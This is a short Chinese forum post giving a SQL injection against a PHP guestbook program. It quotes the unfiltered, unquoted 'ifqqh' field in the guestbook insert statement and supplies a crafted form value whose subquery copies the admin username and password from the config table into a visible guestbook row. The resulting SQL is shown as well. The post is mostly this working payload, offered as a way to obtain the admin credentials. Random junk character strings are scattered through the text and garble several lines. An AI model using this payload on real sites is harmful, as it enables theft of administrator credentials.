留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
* h% y0 a# C5 [/ y4 s$ z' o, b' Z9 @0 X* D; a5 c9 \; H, a
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。. q& d" l& U& ?$ d( W
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
7 z: b; t+ z3 u; c* H! A, M0 X
8 M* K$ A6 B9 `/ q/ n: U9 ]. S- t提交的时候把ifqqh的值改一下。变成0 z5 V t2 _; O: Z# o' z! A
3 B, W9 d1 w' K1 q! d
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />5 E( c4 [) s6 Z& K3 R; l8 n
- y0 r& Q3 c0 Y& q) ]6 \
这样SQL插入语句就变了.
' l- C. Z$ J! t0 N7 ]
$ w* ` }+ i% R$ Q. O( |insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)# x8 ^5 L4 f* x5 X# F
% u$ [# M3 x$ e- ?1 a构造了另外一句SQL。并且把帐号密码读出来。& R: K- q( j; \6 V& z
, z* m# J5 I; n3 A; J, c! {
|
发表于 2013-2-19 08:10:11
收藏
支持
反对